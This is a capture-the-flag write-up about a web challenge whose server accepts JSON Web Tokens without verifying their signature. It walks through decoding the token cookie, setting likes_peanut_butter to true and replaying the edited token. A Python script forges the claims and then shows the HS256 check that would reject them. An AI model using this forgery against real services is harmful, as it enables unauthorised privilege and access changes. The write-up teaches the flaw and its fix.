How To Solve
This time, simply modifying the URL doesn't help.
When you push the 'retrieve' button on the /profile page, you get a message telling you that you can only get the best brand when you like peanut butter. A quick look at the Network tab in Chrome DevTools shows that this message is the response to a GET request the page sends to the server after the button click. Under the request headers, you can see that a cookie named token is sent along with that request. This is interesting.
When visiting the /profile page, a GET request for profile information is made to the server. The server responds with the information but also instructs the browser (via a Set-Cookie header) to store a cookie. In this case that cookie is named token and its value is a JSON Web Token (JWT). You can use the Application tab in Chrome DevTools to inspect the cookie and copy its value. A JWT is three base64url-encoded segments separated by dots (header, payload, signature), so you can simply decode it with an online tool such as jwt.io; no key is needed to read it.
The obtained payload JSON is:

    {
      "role": "CTF Participant",
      "likes_peanut_butter": false
    }
In this tool, modify the JSON by setting likes_peanut_butter to true (this was the requirement for obtaining the 'best brand'). The tool re-encodes the payload and produces a new JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6dHJ1ZX0.Ndo_jZn8fFltuKiZK9lyVoXyLuiueaPLUmuC7_0Y8j8

Note what this implies: the header declares "alg": "HS256", so the third segment is an HMAC-SHA256 over the first two segments, keyed with a secret only the server should know. The tool does not have that secret, so the signature on the new token is not one the server computed. A server that actually verifies the signature would reject this token; the fact that the challenge accepts it means the server reads the claims from the token without checking the signature at all. That is the real vulnerability here, not the editable cookie.
In your Chrome DevTools, change the value of the token cookie to the new JWT. Now simply push the 'retrieve' button again to obtain the flag. Do not refresh the page first: a refresh triggers the initial GET request for profile information again, and the server's Set-Cookie response overwrites your modified cookie with the original token, so the retrieve request would again carry likes_peanut_butter set to false.
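The following Python script is an added example, not part of the original write-up or the challenge code. It reproduces the manual steps above (decode the payload, flip likes_peanut_butter, re-emit the token with the original header and signature) and, alongside, shows the HS256 verification a correct server would perform, which rejects the tampered token. The signing secret is a constructed value for the demo; the challenge server's real secret is unknown.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    # JWT segments are base64url without '=' padding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the padding JWTs strip before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str) -> dict:
    # Read header and claims WITHOUT checking the signature, exactly like an
    # online decoder does. Never use this on the server side for authorisation.
    header_b64, payload_b64, _signature = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
    }


def sign_hs256(header_b64: str, payload_b64: str, secret: bytes) -> str:
    # HS256 signature: HMAC-SHA256 over "<header>.<payload>", base64url encoded
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    return b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())


def make_jwt(claims: dict, secret: bytes) -> str:
    # Compact JSON (no spaces) gives the same payload encoding seen in the challenge token
    header_b64 = b64url_encode(
        json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode()
    )
    payload_b64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header_b64}.{payload_b64}.{sign_hs256(header_b64, payload_b64, secret)}"


def forge_claims(token: str, changes: dict) -> str:
    # The attacker's step: edit claims, keep header and signature as they were.
    # Only a server that never verifies the signature will accept the result.
    header_b64, payload_b64, signature = token.split(".")
    claims = json.loads(b64url_decode(payload_b64))
    claims.update(changes)
    new_payload_b64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header_b64}.{new_payload_b64}.{signature}"


def verify_hs256(token: str, secret: bytes) -> bool:
    # What the server should do: pin the algorithm, recompute the HMAC over
    # header.payload and compare in constant time before trusting any claim.
    try:
        header_b64, payload_b64, signature = token.split(".")
    except ValueError:
        return False
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return False
    expected = sign_hs256(header_b64, payload_b64, secret)
    return hmac.compare_digest(expected, signature)


# Constructed demo secret (assumption): the real challenge secret is not known.
DEMO_SECRET = b"demo-secret-not-the-real-one"
# Token as the server would issue it, with the claims seen in the write-up
ORIGINAL = make_jwt({"role": "CTF Participant", "likes_peanut_butter": False}, DEMO_SECRET)
# Token as produced by editing the payload in a decoder tool
FORGED = forge_claims(ORIGINAL, {"likes_peanut_butter": True})

if __name__ == "__main__":
    print("original claims:", decode_jwt(ORIGINAL)["payload"])
    print("forged claims:  ", decode_jwt(FORGED)["payload"])
    print("server verifies original:", verify_hs256(ORIGINAL, DEMO_SECRET))
    print("server verifies forged:  ", verify_hs256(FORGED, DEMO_SECRET))
```

The first two segments of FORGED are byte-for-byte the header and payload of the token shown above (compact JSON, base64url, no padding); only the signature differs, which is exactly what verify_hs256 catches and the challenge server does not.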